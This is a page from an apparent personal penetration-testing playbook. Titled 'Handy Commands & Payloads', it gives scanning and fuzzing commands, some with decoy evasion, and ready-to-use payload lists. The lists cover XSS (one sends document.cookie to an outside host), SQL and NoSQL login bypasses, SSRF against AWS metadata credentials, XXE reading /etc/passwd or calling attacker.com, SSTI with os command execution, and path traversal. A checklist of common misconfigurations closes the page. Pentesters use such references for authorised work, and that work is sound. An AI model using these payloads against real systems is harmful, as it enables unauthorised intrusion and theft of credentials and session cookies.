PenTest Playbook
  • Welcome!
  • Web App Pentesting
    • SQL Injection
    • NoSQL Injection
    • XSS
    • CSRF
    • SSRF
    • XXE
    • IDOR
    • SSTI
    • Broken Access Control/Privilege Escalation
    • Open Redirect
    • File Inclusion
    • File Upload
    • Insecure Deserialization
      • XMLDecoder
    • LDAP Injection
    • XPath Injection
    • JWT
    • Parameter Pollution
    • Prototype Pollution
    • Race Conditions
    • CRLF Injection
    • LaTeX Injection
    • CORS Misconfiguration
    • Handy Commands & Payloads
  • Active Directory Pentest
    • Domain Enumeration
      • User Enumeration
      • Group Enumeration
      • GPO & OU Enumeration
      • ACLs
      • Trusts
      • User Hunting
    • Domain Privilege Escalation
      • Kerberoast
        • AS-REP Roast (Kerberoasting)
        • CRTP Lab 14
      • Targeted Kerberoasting
        • AS-REP Roast
        • Set SPN
      • Kerberos Delegation
        • Unconstrained Delegation
          • CRTP Lab 15
        • Constrained Delegation
          • CRTP Lab 16
        • Resource Based Constrained Delegation (RBCD)
          • CRTP Lab 17
      • Across Trusts
        • Child to Parent (Cross Domain)
          • Using Trust Tickets
            • CRTP Lab 18
          • Using KRBTGT Hash
            • CRTP Lab 19
        • Cross Forest
          • Lab 20
        • AD CS (Across Domain Trusts)
          • ESC1
            • CRTP Lab 21
        • Trust Abuse - MSSQL Servers
          • CRTP Lab 22
    • Lateral Movement
      • PowerShell Remoting
      • Extracting Creds, Hashes, Tickets
      • Over-PassTheHash
      • DCSync
    • Evasion
      • Evasion Cheetsheet
    • Persistence
      • Golden Ticket
        • CRTP Lab 8
      • Silver Ticket
        • CRTP Lab 9
      • Diamond Ticket
        • CRTP Lab 10
      • Skeleton Key
      • DSRM
        • CRTP Lab 11
      • Custom SSP
      • Using ACLs
        • AdminSDHolder
        • Rights Abuse
          • CRTP Lab 12
        • Security Descriptors
          • CRTP Lab 13
    • Tools
    • PowerShell
  • AI Security
    • LLM Security Checklist
    • GenAI Vision Security Checklist
    • Questionnaire for AI/ML/GenAI Engineering Teams
  • Network Pentesting
    • Information Gathering
    • Scanning
    • Port/Service Enumeration
      • 21 FTP
      • 22 SSH
      • 25, 465, 587 SMTP
      • 53 DNS
      • 80, 443 HTTP/s
      • 88 Kerberos
      • 135, 593 MSRPC
      • 137, 138, 139 NetBios
      • 139, 445 SMB
      • 161, 162, 10161, 10162/udp SNMP
      • 389, 636, 3268, 3269 LDAP
      • Untitled
      • Page 14
      • Page 15
      • Page 16
      • Page 17
      • Page 18
      • Page 19
      • Page 20
    • Nessus
    • Checklist
  • Mobile Pentesting
    • Android
      • Android PenTest Setup
      • Tools
    • iOS
  • DevSecOps
    • Building CI Pipeline
    • Threat Modeling
    • Secure Coding
      • Code Review Examples
        • Broken Access Control
        • Broken Authentication
        • Command Injection
        • SQLi
        • XSS
        • XXE
        • SSRF
        • SSTI
        • CSRF
        • Insecure Deserialization
        • XPath Injection
        • LDAP Injection
        • Insecure File Uploads
        • Path Traversal
        • LFI
        • RFI
        • Prototype Pollution
        • Connection String Injection
        • Sensitive Data Exposure
        • Security Misconfigurations
        • Buffer Overflow
        • Integer Overflow
        • Symlink Attack
        • Use After Free
        • Out of Bounds
      • C/C++ Secure Coding
      • Java/JS Secure Coding
      • Python Secure Coding
  • Malware Dev
    • Basics - Get detected!
    • Not so easy to stage!
    • Base64 Encode Shellcode
    • Caesar Cipher (ROT 13) Encrypt Shellcode
    • XOR Encrypt Shellcode
    • AES Encrypt Shellcode
  • Handy
    • Reverse Shells
    • Pivoting
    • File Transfers
    • Tmux
  • Wifi Pentesting
    • Monitoring
    • Cracking
  • Buffer Overflows
  • Cloud Security
    • AWS
    • GCP
    • Azure
  • Container Security
  • Todo
Powered by GitBook
On this page
  • Test SSL
  • Nikto
  • Nuclei
  • Nuclei Fuzzer
  • Directory Fuzzing
  • VHOST Fuzzing
  • SQLi
  • XSS Best Payloads
  • SQL Injection Payloads
  • NoSQL Injection Payloads
  • SSRF Payloads
  • XXE Payloads
  • SSTI Payloads
  • File Inclusion Payloads
  • CRLF Injection Payloads
  • Easy Vulnerabilities & Security Misconfigurations to Report
  • Security Headers
  • Cross-Origin Resource Sharing (CORS)
  • Cookie Attributes
  • Authentication & Session Management
  • File Handling
  • Access Controls
  • Web Server Configuration
  • Information Disclosure
  • Business Logic & Other Issues
  • Additional Points
  1. Web App Pentesting

Handy Commands & Payloads

Commands and Payloads that I use the most to get the basics covered.

Nmap

Initial Port Scan and Service Scan with Evasive Techniques:

nmap -f -D RND:10 -p- -Pn $TARGET

nmap -sC -sV -p $(nmap -f -D RND:10 -p- -Pn $TARGET | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',') $TARGET

Other nmap scans:

sudo nmap -Pn -p 3389 -ff -send-eth -script rdp-enum-encryption $IP

Test SSL

testssl $URL

Nikto

nikto -host $URL
nikto -h $URL -O STATIC-COOKIE="Authorization: Bearer..."

Nuclei

nuclei -u $URL
nuclei -u $URL -H "cookie: "

# Use secrets.yaml file for other authentication mechanisms

Nuclei Fuzzer

nf -d $URL

Directory Fuzzing

  1. Gobuster:

    gobuster dir -u $URL -t 20 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -b 302,404 -o gobuster_dir.txt

  2. ffuf (Basic):

    ffuf -u $URL/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -mc 200 -c -r -sf -t 20 -o ffuf_dir.csv -of csv

  3. Ffuf (API):

    ffuf -request api.req -w /opt/SecLists/Discovery/Web-Content/api/common-paths,actions-lowercase,/opt/SecLists/Fuzzing/special-chars.txt -request-proto http -mc 200 -c -r -sf -o fuff_api_dir.csv -of csv

VHOST Fuzzing

ffuf -H "Host: FUZZ.collect.htb" -u http://collect.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -c -r -sf -ac -o subd_ffuf.txt

SQLi

sqlmap -r app.req --level 5 --risk 3 --batch

XSS Best Payloads

<script>alert(1)</script>
<script src=//14.rs></script>
"><svg onload=alert()>
<embed src=//14.rs>
<!--><script src=//14.rs>
url=%26%2302java%26%23115cript:alert(document.domain)
<video><source onerror=location=/\02.rs/+document.cookie>
<script>alert(document.domain)</script>
<a href=javascript:confirm()>click here

SQL Injection Payloads

' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /* 
' OR '1'='1' //
' OR '1'='1' #
admin' --
admin' /*
admin' //
admin' #
' OR 1=1
' OR 1=1 --
' OR 1=1 /*
' OR 1=1 //
' OR 1=1 #
' OR 'a'='a
' OR 'a'='a' --
' OR 'a'='a' /*
' OR 'a'='a' //
' OR 'a'='a' #

NoSQL Injection Payloads

{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": "admin", "password": {"$ne": null}}
{"username": "admin", "password": {"$gt": ""}}
{"username": "admin", "password": {"$in": [""]}}
{"username": "admin", "password": {"$where": "this.password.length > 0"}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$ne": null}}
{"username": {"$eq": "admin"}, "password": {"$ne": "admin"}}
{"username": {"$ne": "admin"}, "password": {"$exists": true}}
{"username": {"$in": ["admin", "user"]}, "password": {"$ne": "password"}}

SSRF Payloads

# Retrieve AWS Metadata
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/network/interfaces/macs/

http://127.0.0.1:80
http://127.0.0.1:8080
http://localhost:80
http://localhost:8080
http://0.0.0.0:80
http://0.0.0.0:8080
http://[::]:80
http://[::]:8080
http://[::1]:80
http://[::1]:8080
http://internal-service:80
http://internal-service:8080

XXE Payloads

xmlCopy code<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://attacker.com/evil.dtd" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "ftp://attacker.com/evil.txt" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "jar:http://attacker.com/evil.jar!/" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "gopher://attacker.com/evil" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "data:text/plain,evil" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "php://input" > ]><foo>&xxe;</foo>

SSTI Payloads

# jinja
{{7*7}}
{{7*'7'}}
{{7*'7'.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{config.items()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{request['application']['__globals__']['__builtins__']['__import__']('os').popen('id').read()}}
{% for c in [].__class__.__base__.__subclasses__() %}
{{c}}
{% endfor %}
{{''.__class__.mro()[1].__subclasses__()[40].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()}}
{{config['SECRET_KEY'].__class__.__mro__[2].__subclasses__()[40]('id').read()}}
{{request.application.__globals__.__builtins__.open('index.html').read()}}

File Inclusion Payloads

../../../../../../etc/passwd
../../../../../../boot.ini
../../../../../../windows/win.ini
../../../../../../winnt/win.ini
../../../../../../windows/system.ini
../../../../../../windows/system32/drivers/etc/hosts
../../../../../../winnt/system32/drivers/etc/hosts
../../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../usr/local/apache/logs/access.log
../../../../../../usr/local/apache/logs/error.log
../../../../../../var/www/html/index.php
../../../../../../var/www/html/wp-config.php
../../../../../../usr/local/etc/php.ini
../../../../../../etc/httpd/conf/httpd.conf
../../../../../../etc/mysql/my.cnf

CRLF Injection Payloads

GET / HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET /index.html HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

POST /submit HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET / HTTP/1.1\r\nHost: example.com\r\nSet-Cookie: injected-cookie=value\r\n

POST /login HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

GET /search?q=test HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

POST /upload HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET /download HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

POST /create HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET /api/v1/data HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

Easy Vulnerabilities & Security Misconfigurations to Report

Vulnerabilities that could be found in the early stages (first few hours) of a pentest.

Security Headers

  • Misconfigured Security Headers:

    • X-Frame-Options

    • X-XSS-Protection

    • X-Content-Type-Options

    • Strict-Transport-Security

    • Content-Security-Policy (CSP)

    • Referrer-Policy

Cross-Origin Resource Sharing (CORS)

  • Insecure CORS Configuration:

    • Allowing wildcard (*) origin

    • Allowing untrusted origins

    • Lack of proper validation

Cookie Attributes

  • Insecure Cookie Attributes:

    • Missing HttpOnly flag

    • Missing Secure flag

    • Missing SameSite attribute

Authentication & Session Management

  • Concurrent Logins Allowed:

    • Multiple sessions from different IPs

  • Improper Session Timeout:

    • Long or no session expiration

  • Improper Invalidation of Cookie Post Logout:

    • Session remains active after logout

  • Weak Password Policies:

    • No complexity requirements

    • Lack of rate limiting

File Handling

  • Unrestricted File Upload:

    • No file type validation

    • No file size restrictions

    • No scanning for malware

Access Controls

  • Staging Environment Accessible from External Network:

    • Exposed internal environments

  • Sensitive Directories Accessible:

    • /.git/, /.svn/, /backup/, /config/

Web Server Configuration

  • Clickjacking:

    • Missing X-Frame-Options header

  • Weak SSL Ciphers:

    • Use of deprecated SSL/TLS versions

    • Weak cipher suites enabled

  • Web Server Fingerprinting:

    • Banner Grabbing revealing server information

Information Disclosure

  • Verbose Error Messages:

    • Detailed stack traces

    • Application/Server details in error messages

  • Directory Listing Enabled:

    • Ability to list files in web directories

Business Logic & Other Issues

  • Lack of Rate Limiting:

    • Brute force or DoS vulnerabilities

  • No Account Lockout:

    • Unlimited login attempts

  • Weak Default Credentials:

    • Use of default passwords for admin accounts

  • HTTP Methods:

    • TRACE/TRACK methods enabled

  • Referrer Policy:

    • No Referrer Policy header

  • API Security:

    • Lack of authentication

    • Lack of rate limiting

    • Exposed sensitive endpoints

  • Insecure Direct Object References (IDOR):

    • Direct access to unauthorized resources

  • Lack of Input Validation:

    • No sanitization of user input

Additional Points

  • Backup Files Accessible:

    • .bak, .old, .save files accessible

  • Exposed API Keys or Tokens:

    • API keys or tokens in URLs, JavaScript, etc.

  • Insufficient Logging and Monitoring:

    • Lack of logging for security events

  • Cross-Site Request Forgery (CSRF):

    • Missing or incorrect CSRF tokens

  • Insufficient Transport Layer Security:

    • HTTP instead of HTTPS

  • Autocomplete Enabled for Sensitive Fields:

    • Sensitive form fields have autocomplete enabled

  • Insecure Directories:

    • /admin/, /config/, /backup/ directories exposed

  • Insecure Third-Party Integrations:

    • Unpatched or outdated third-party libraries and frameworks

PreviousCORS MisconfigurationNextActive Directory Pentest

Last updated 10 months ago